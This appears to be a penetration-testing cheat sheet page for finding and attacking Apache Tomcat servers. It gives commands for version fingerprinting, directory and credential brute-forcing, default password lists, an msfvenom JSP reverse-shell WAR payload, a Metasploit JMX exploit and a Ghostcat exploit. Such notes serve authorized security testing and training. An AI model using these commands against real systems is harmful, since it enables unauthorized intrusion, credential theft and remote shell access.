7.-Tomcat-discovery-and-enumeration

1. Tomcat Version Detection

Methods:

  • HTTP Server Header:

    curl -I http://target:port/ | grep -i "Server"

    • Check if the "Server" header reveals the Tomcat version.

  • /docs Page:

    curl -s http://target:port/docs/ | grep -i "Apache Tomcat"

    • Default documentation page may disclose the version.

  • Error Pages:

    curl -s http://target:port/nonexistentpage

    • Sometimes, error pages leak version information.

  • Specific File Checks:

    • If access is gained, check JAR files in /lib directory.

    • Version-specific vulnerabilities may relate to these files.

2. Tomcat Directory Structure (Key Files)

  • /bin - Executable scripts.

  • /conf/tomcat-users.xml - Stores user credentials and roles.

  • /conf/web.xml - Defines web application routes and configurations.

  • /webapps/ - Web application deployment directory.

3. Manager Application Enumeration

Directory Brute-forcing:

  • Using Gobuster:

    gobuster dir -u http://target:port/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  • Using Wfuzz:

    wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://target:port/FUZZ

  • Look for /manager and /host-manager paths.

Authentication Checks:

  • Default Credentials:

    tomcat:tomcat
admin:admin
tomcat:password
role1:role1
role:changeme

  • Brute-forcing Credentials:

    hydra -l tomcat -P /usr/share/wordlists/rockyou.txt target http-get /manager/html

  • If access is gained, check for application deployment, undeployment, and management functionalities.

4. Tomcat Credential Enumeration

tomcat-users.xml Enumeration:

  • Local File Inclusion (LFI) to read credentials:

    cat /conf/tomcat-users.xml

  • Check for plaintext usernames and passwords.

web.xml Enumeration:

  • Identify application endpoints:

    cat /webapps/[app]/WEB-INF/web.xml

  • Useful for mapping application routes and identifying potential attack vectors.

5. WAR File Upload (Remote Code Execution)

  • After authentication to /manager:

    • Upload a malicious WAR file containing a JSP web shell.

  • Create JSP reverse shell:

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourIP LPORT=yourPort -f war > shell.war

  • Deploy via Manager interface and access via browser:

    http://target:port/shell.jsp

6. JMX Enumeration & Exploitation

Using jmxterm:

java -jar jmxterm-1.0-alpha-4-uber.jar --url service:jmx:rmi:///jndi/rmi://target:port/jmxrmi

  • Explore MBeans and their attributes/operations.

Using Metasploit:

use exploit/multi/misc/java_jmx_server
set RHOST target
set RPORT 1099
run

  • JMX can expose sensitive information and allow for RCE.

7. Connector Enumeration

AJP Connector:

  • Check if AJP is enabled (Default: Port 8009):

    nmap -p 8009 --script ajp-headers target

  • Exploit AJP using Ghostcat (CVE-2020-1938):

    python3 ghostcat.py -u target:8009

  • AJP misconfigurations can lead to sensitive file disclosure or code execution.

8. Web Application Enumeration

Directory & File Enumeration:

  • Enumerate web applications in /webapps/ directory:

    gobuster dir -u http://target:port/webapps/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  • Find JSP files and servlets:

    wfuzz -c -z file,/usr/share/wordlists/extensions_common.txt --hc 404 http://target:port/FUZZ.jsp

Parameter Fuzzing:

  • Fuzz application parameters for vulnerabilities:

    ffuf -u http://target:port/index.php?FUZZ=value -w /usr/share/wordlists/parameters.txt

9. Configuration File Enumeration

  • Identify sensitive configuration files:

    • catalina.properties

    • server.xml

    • context.xml

  • Extract credentials, ports, and security settings.

10. CVE Enumeration & Exploitation

  • Identify version-specific vulnerabilities:

    searchsploit tomcat [version]

  • Public exploits for Tomcat:

    exploitdb -s tomcat

Important Considerations

  • Least Privilege: Use minimal required privileges during enumeration.

  • Target Scope: Stay within the defined scope of the penetration test.

  • Documentation: Record all findings and methodologies.

  • Client Communication: Keep the client informed of critical discoveries.

  • Clean Up: Remove temporary files and restore original configurations if testing in an authorized environment.

Summary of Key Findings

  • Server Header & Docs: Identify Tomcat version.

  • tomcat-users.xml: Extract credentials and roles.

  • web.xml: Map routes and servlets.

  • /manager & /host-manager: Manage applications.

  • WAR File Upload: Achieve RCE.

  • JMX Exposure: Possible RCE and data leaks.

  • AJP Connector: Check for misconfigurations.

  • Common CVEs: Search for known exploits.

Previous10.-Attacking-jenkinsNext8.-Attacking-tomcat

Last updated